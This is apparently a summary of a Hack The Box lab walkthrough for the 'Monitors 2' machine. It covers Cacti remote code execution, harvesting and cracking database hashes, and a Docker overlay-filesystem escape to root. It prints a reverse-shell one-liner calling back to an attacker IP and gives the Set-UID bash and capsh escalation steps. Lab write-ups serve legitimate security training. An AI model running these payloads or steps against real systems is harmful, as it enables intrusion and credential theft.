Hack The Box - Monitoring 2 Exploit Walkthrough

Jul 24, 2024

IPPSEC: Monitoring 2 from Hack The Box

Overview

  • Target: Hack the Box machine named Monitors 2
  • Exploitation Summary: Gain initial foothold via a vulnerable Cacti instance, SSH into the target system, navigate a Docker container, and achieve root using Docker vulnerabilities

Steps and Key Points

Initial Foothold

  1. Cacti Exploit

    • Service: Cacti version 1.2.2.2 at IP 10.10.11.211
    • Vulnerability: Remote code execution by exploiting remote_agent.php with specific GET parameters (action=polldata, X-Forwarded-For=127.0.0.1, poller_id, host_id, local_data_id)
    • Metasploit & Python Scripts: Approach is to not blindly run scripts, but understand the mechanics by manually sending requests through tools like Burp Suite
  2. Executing Payload

    • Payload: bash -c 'bash -i >& /dev/tcp/10.10.14.8/9001 0>&1' encoded and sent via Burp Suite
    • Acquiring Shell: Connect back shell opens on specified port, providing access to the Docker environment

Docker Environment

  1. Database Configuration

    • Credentials: Found in include/config.php — Username: root, Password: root
    • MySQL Connection: Connect to the database via DB hostname specified in configuration
    • User Data Extraction: Harvest user credentials from the Cacti database (user_auth table)
  2. Cracking Hashes

    • Extracted hashes from database (user_auth) and cracked using hashcat with correct mode (tested multiple modes, bcrypt identified)
    • Cracked password: FunkyMonkey for user Marcus

Escalation via Docker

  1. EMAIL Vulnerability Information: In an email on the system, pointers to kernel, Cacti, and Docker vulnerabilities

    • Kernel vulnerability not applicable as per uname details (5.4.0-1047 not vulnerable)
    • Docker Vulnerability: Version < 21.10.9 vulnerable to overlay FS issue
    • Exploit Plan: Gain root in Docker container, create a Set-UID executable and use it on the host system
  2. Privilege Escalation

    • Capability Exploitation: Using capsh binary to elevate privileges within the container
    • Steps: Copy bash to temp, make bash Set-UID owned by root, escalate using capsh --uid=0 --gid=0 --
    • Transferring Set-UID: Utilize overlay FS to ensure Set-UID executable in Docker container affects host
  3. Achieving Root on Host

    • Execute the modified bash with -p flag to inherit privileges, gaining root on host system
    • Access root.txt

Summary

  • Initial Access: Cacti remote code execution to Docker container
  • Privilege Escalation: Docker overlay FS to modify host filesystem, execute Set-UID binary
  • Result: Root access successfully achieved through a comprehensive exploitation path

Key Learnings

  • Flexibility and Understanding: Importance of understanding exploit mechanics rather than relying on scripts
  • Operational Awareness: Checking configurations and user data within compromised environments
  • Leveraging Capabilities: Utilizing available binaries and filesystem quirks (Docker overlay FS) for privilege escalation

Tools Used

  • Burp Suite
  • Metasploit & Manual Exploitation
  • MySQL and Linux command-line tools
  • Hashcat for password cracking
  • Docker container escape techniques